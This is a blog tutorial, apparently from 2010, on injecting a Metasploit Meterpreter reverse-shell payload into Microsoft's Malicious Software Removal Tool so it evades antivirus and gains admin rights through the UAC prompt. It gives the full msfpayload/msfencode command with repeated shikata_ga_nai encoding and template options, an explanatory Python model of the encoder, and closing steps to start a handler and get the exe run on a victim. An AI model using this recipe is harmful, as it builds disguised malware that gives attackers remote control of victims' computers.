Sunday 5 December 2010

Hide Payload In Trusted EXE to Bypass AV's

This is a video to show you how to hide the Metasploit Meterpreter payload in a trusted exe to help bypass antivirus detection.


This is useful because AV detection of Meterpreter is largely signature based: a payload that has been re-encoded with random keys and then dropped inside a file that looks like a well-known Microsoft tool no longer matches the stock Meterpreter signatures. It is not a guarantee though, so test the result against the AV you expect to run into before you rely on it.


In my demonstration I use the Microsoft Malicious Software Removal Tool (hehe the irony). This is a good choice for the following reasons:
1. It is the real Microsoft-signed tool, so the name, icon and version info all look legit. Be aware though that injecting the payload changes the file bytes, so the Authenticode signature no longer validates on the modified exe; what you keep is the look of a trusted Microsoft tool, not a valid signature.
2. Its manifest asks to run as administrator, so UAC prompts the user to elevate, giving us higher privs :)
To keep the payload undetected and hidden from AVs I recommend injecting it into a trusted exe. In the video I use Microsoft's Malicious Software Removal Tool. The good thing about this exe is that it works! Not all exes will, so you will have to do some testing: with some templates the payload never executes, with others the host program crashes or behaves oddly, so test each candidate yourself. If you want the original program to keep running normally while the payload runs in its own thread, add msfencode's -k option alongside -x; without it the template's own code is replaced and the user sees the tool do nothing. The best thing about the Microsoft exe is that it asks the user to run as admin, which means on Windows Vista/7 you will be able to get higher privileges and run commands like "scheduleme" shown in my Backdoor video.


./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= R|./msfencode -c 5 -e x86/shikata_ga_nai -x /root/ -t exe > /root/

OK so what this command does is

(./msfpayload windows/meterpreter/reverse_tcp LHOST=***.***.***.*** LPORT=****) = the basic Metasploit Meterpreter payload config. LHOST is the IP the victim connects back to and LPORT is the port your handler listens on (a port number, not an IP).

(R) = output the payload raw, without wrapping it into an exe or any other format, so it can be piped straight into msfencode.

(|./msfencode) = pipes the raw payload into the encoding process.

(./msfencode -c 5 -e x86/shikata_ga_nai) = runs 5 passes of the x86/shikata_ga_nai encoder. Each pass XORs the previous output with a fresh random key and prepends a new decoder stub, so every run produces different bytes for the same payload.

(-x /root/ -t exe > /root/name.exe) = use the exe at that path as the template, inject the encoded payload into it, and write the resulting exe out as name.exe.
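To make the "-c 5 with x86/shikata_ga_nai" step concrete, here is an added model of what the encoder does to the payload bytes. This is my own illustration, not Metasploit code: it reproduces the XOR additive feedback arithmetic shikata_ga_nai applies to 32-bit blocks (XOR with a running key, then advance the key by adding the plaintext dword, as I understand the scheme), and stands in a hypothetical 12-byte "STUB" header for the real polymorphic x86 decoder stub. It does not emit executable x86, and the sample payload is constructed bytes, not shellcode.

```python
"""Model of what `msfencode -c 5 -e x86/shikata_ga_nai` does to a payload.

Added illustration, not Metasploit code. The 12-byte STUB header is a
hypothetical stand-in for the real x86 decoder stub; the arithmetic is
the XOR-additive-feedback scheme as I understand it.
"""
import os
import struct

MASK = 0xFFFFFFFF
STUB_TAG = b"STUB"   # hypothetical stand-in for the x86 decoder stub
STUB_LEN = 12        # tag(4) + key(4) + original length(4)


def _pad4(buf):
    """The encoder works on whole dwords, so pad to a multiple of 4."""
    return buf + b"\x00" * (-len(buf) % 4)


def xaf_encode(plain, key):
    """One pass: XOR each dword with the running key, then advance the key
    by adding the plaintext dword (additive feedback)."""
    out = bytearray()
    for (orig,) in struct.iter_unpack("<I", _pad4(plain)):
        out += struct.pack("<I", orig ^ key)
        key = (key + orig) & MASK
    return bytes(out)


def xaf_decode(enc, key):
    """Mirror of xaf_encode; this is what the decoder stub does at run time."""
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", enc):
        orig = word ^ key
        out += struct.pack("<I", orig)
        key = (key + orig) & MASK
    return bytes(out)


def encode_layers(payload, count, keys=None):
    """Apply `count` nested passes, like msfencode -c: every pass wraps the
    previous stub+ciphertext in a new stub carrying a fresh random key."""
    buf = payload
    for i in range(count):
        key = keys[i] if keys else struct.unpack("<I", os.urandom(4))[0]
        header = STUB_TAG + struct.pack("<II", key, len(buf))
        buf = header + xaf_encode(buf, key)
    return buf


def decode_layers(blob, count):
    """Peel the layers back off, outermost first."""
    buf = blob
    for _ in range(count):
        tag, key, length = struct.unpack("<4sII", buf[:STUB_LEN])
        if tag != STUB_TAG:
            raise ValueError("not one of our stubs")
        buf = xaf_decode(buf[STUB_LEN:], key)[:length]
    return buf


def differing_bytes(a, b):
    """Count positions where two encodings of the same input differ."""
    return sum(x != y for x, y in zip(a, b))


# Constructed sample input: NOT real shellcode.
SAMPLE_PAYLOAD = b"\x90\x90\xcc" + b"meterpreter-reverse_tcp-sample-bytes"

if __name__ == "__main__":
    first = encode_layers(SAMPLE_PAYLOAD, 5)
    second = encode_layers(SAMPLE_PAYLOAD, 5)
    print("5 layers: %d -> %d bytes" % (len(SAMPLE_PAYLOAD), len(first)))
    print("bytes differing between two runs:", differing_bytes(first, second))
    print("roundtrip ok:", decode_layers(first, 5) == SAMPLE_PAYLOAD)
```

Two runs over the same payload give different bytes almost everywhere (only the stub tag is fixed here; the real stub varies its registers too), which is why a signature taken from one encoded sample does not match the next one, and why AV vendors moved to emulating the decoder instead. Each extra -c pass only adds one more stub and another key, so more iterations cost size and start-up time without changing the principle.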
Start a handler first (exploit/multi/handler with the same payload, LHOST and LPORT as above), then get the exe executed on the victim machine and bingo :)
